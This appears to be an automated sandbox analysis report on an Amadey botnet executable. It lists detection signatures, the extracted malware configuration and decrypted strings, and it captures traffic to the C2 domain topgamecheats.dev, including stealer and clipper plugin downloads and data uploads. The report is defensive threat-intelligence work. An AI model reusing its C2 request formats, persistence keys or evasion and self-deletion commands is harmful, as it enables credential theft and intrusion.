Windows Analysis Report
GhLMDfzXqQ.exe

Overview

General Information

Sample name: GhLMDfzXqQ.exe (renamed because the original name is a hash value)
Original sample name: 11daaab30c6301d62d80a0bd038d4e87.exe
Analysis ID: 1427728
MD5: 11daaab30c6301d62d80a0bd038d4e87
SHA1: b5309987895d1912547356d9ed90c44fafb5e810
SHA256: 4b3214ca5ec9721278989a43bf21b9450e5b8597dae25a4262dbece4a1193351
Tags: Amadeyexe

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Amadey
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection

Source: GhLMDfzXqQ.exe Avira: detected
Source: 24.2.Dctooux.exe.400000.0.raw.unpack Malware Configuration Extractor: Amadey {"C2 url": "topgamecheats.dev/8bjndDcoA3/index.php", "Version": "4.19"}
Source: topgamecheats.dev Virustotal: Detection: 23%
Source: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1 Virustotal: Detection: 22%
Source: http://topgamecheats.dev/8bjndDcoA3/index.php?wal=1 Virustotal: Detection: 22%
Source: http://topgamecheats.dev/ Virustotal: Detection: 23%
Source: http://topgamecheats.dev/8bjndDcoA3/index.phpd5 Virustotal: Detection: 22%
Source: http://topgamecheats.dev/fud_new.exe Virustotal: Detection: 23%
Source: http://topgamecheats.dev/8bjndDcoA3/Plugins/clip64.dll Virustotal: Detection: 22%
Source: http://topgamecheats.dev/8bjndDcoA3/index.phpd Virustotal: Detection: 22%
Source: http://topgamecheats.dev/fud_new.exeLMEMP Virustotal: Detection: 22%
Source: http://topgamecheats.dev/8bjndDcoA3/index.php Virustotal: Detection: 22%
Source: http://topgamecheats.dev/8bjndDcoA3/Plugins/cred64.dll Virustotal: Detection: 22%
Source: topgamecheats.dev/8bjndDcoA3/index.php Virustotal: Detection: 22%
Source: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1# Virustotal: Detection: 22%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\clip64[1].dll ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\fud_new[1].exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\cred64[1].dll ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe ReversingLabs: Detection: 81%
Source: GhLMDfzXqQ.exe ReversingLabs: Detection: 47%
Source: GhLMDfzXqQ.exe Virustotal: Detection: 44%
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: topgamecheats.dev
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: /8bjndDcoA3/index.php
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: S-%lu-
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: cbb1d94791
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Dctooux.exe
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Startup
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: cmd /C RMDIR /s/q
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: rundll32
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Programs
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: %USERPROFILE%
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: cred.dll|clip.dll|
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: http://
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: https://
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: /Plugins/
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: &unit=
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: shell32.dll
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: kernel32.dll
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: GetNativeSystemInfo
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: ProgramData\
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: AVAST Software
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Kaspersky Lab
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Panda Security
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Doctor Web
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: 360TotalSecurity
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Bitdefender
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Norton
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Sophos
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Comodo
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: WinDefender
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: 0123456789
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: ------
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: ?scr=1
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: ComputerName
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: -unicode-
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: VideoID
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: DefaultSettings.XResolution
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: DefaultSettings.YResolution
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: ProductName
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: CurrentBuild
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: rundll32.exe
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: "taskkill /f /im "
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: " && timeout 1 && del
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: && Exit"
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: " && ren
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Powershell.exe
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: -executionpolicy remotesigned -File "
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: shutdown -s -t 0
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: random
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: ~L$v(g
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: ~L$v(g
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: 7FKeuO

Compliance

Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Unpacked PE file: 4.2.fud_new.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Unpacked PE file: 24.2.Dctooux.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Unpacked PE file: 36.2.Dctooux.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: GhLMDfzXqQ.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64[1].dll.36.dr, cred64.dll.36.dr
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00440EAD FindFirstFileExW, 4_2_00440EAD
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_04911114 FindFirstFileExW, 4_2_04911114
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00440EAD FindFirstFileExW, 24_2_00440EAD
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_04901114 FindFirstFileExW, 24_2_04901114
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00440EAD FindFirstFileExW, 36_2_00440EAD
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_04951114 FindFirstFileExW, 36_2_04951114
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Dctooux.exe_6e74f07959bc23e75a6b77fd2553fb68ad4fabc_8822d4be_17748468-aec6-4998-b810-796a4d1a1ad0\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Dctooux.exe_c54a861aa4c43cc515c4d65c89eab2e3bda7e7c7_8822d4be_d2b7794f-7375-472a-8406-f114c8994e3a\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue

Networking

Source: Malware configuration extractor URLs: topgamecheats.dev/8bjndDcoA3/index.php
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKcontent-type: application/octet-streamlast-modified: Sun, 14 Apr 2024 19:51:31 GMTetag: "661c33c3-6d000"accept-ranges: bytescontent-length: 446464date: Thu, 18 Apr 2024 00:16:54 GMTserver: LiteSpeedconnection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 3a d0 44 d1 5b be 17 d1 5b be 17 d1 5b be 17 cf 09 2b 17 c5 5b be 17 cf 09 3d 17 a4 5b be 17 cf 09 3a 17 fa 5b be 17 f6 9d c5 17 d2 5b be 17 d1 5b bf 17 a1 5b be 17 cf 09 34 17 d0 5b be 17 cf 09 2a 17 d0 5b be 17 cf 09 2f 17 d0 5b be 17 52 69 63 68 d1 5b be 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 71 19 f2 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 d8 00 00 00 7a 84 02 00 00 00 00 41 19 00 00 00 10 00 00 00 f0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 84 02 00 04 00 00 3f 56 07 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c ce 05 00 28 00 00 00 00 10 84 02 a8 df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 c7 05 00 18 00 00 00 d0 c6 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7d d6 00 00 00 10 00 00 00 d8 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 20 e7 04 00 00 f0 00 00 00 e8 04 00 00 dc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 
64 61 74 61 00 00 00 f4 16 7e 02 00 e0 05 00 00 22 00 00 00 c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 cd 09 00 00 00 00 84 02 00 0a 00 00 00 e6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 df 00 00 00 10 84 02 00 e0 00 00 00 f0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKcontent-type: application/octet-streamlast-modified: Fri, 12 Apr 2024 22:39:08 GMTetag: "6619b80c-139c00"accept-ranges: bytescontent-length: 1285120date: Thu, 18 Apr 2024 00:18:10 GMTserver: LiteSpeedconnection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 db 8d 19 66 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 bc 0f 00 00 54 04 00 00 00 00 00 c8 00 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 40 89 12 00 58 00 00 00 98 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 70 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 d0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 ba 0f 00 00 10 00 00 00 bc 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 02 ce 02 00 00 d0 0f 00 00 d0 02 00 00 c0 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ac bb 00 00 00 a0 12 00 00 44 00 00 00 90 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 70 ad 00 00 00 60 13 00 00 ae 00 00 00 d4 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 82 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKcontent-type: application/octet-streamlast-modified: Fri, 12 Apr 2024 22:39:08 GMTetag: "6619b80c-1b600"accept-ranges: bytescontent-length: 112128date: Thu, 18 Apr 2024 00:18:16 GMTserver: LiteSpeedconnection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 dd 8d 19 66 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 4c 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 30 a0 01 00 9c 00 00 00 cc a0 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 bc 14 00 00 00 8f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 8f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 96 22 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 
68 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 bc 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8bjndDcoA3/Plugins/cred64.dll HTTP/1.1Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTAwMDExHost: topgamecheats.devContent-Length: 100163Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /8bjndDcoA3/Plugins/clip64.dll HTTP/1.1Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
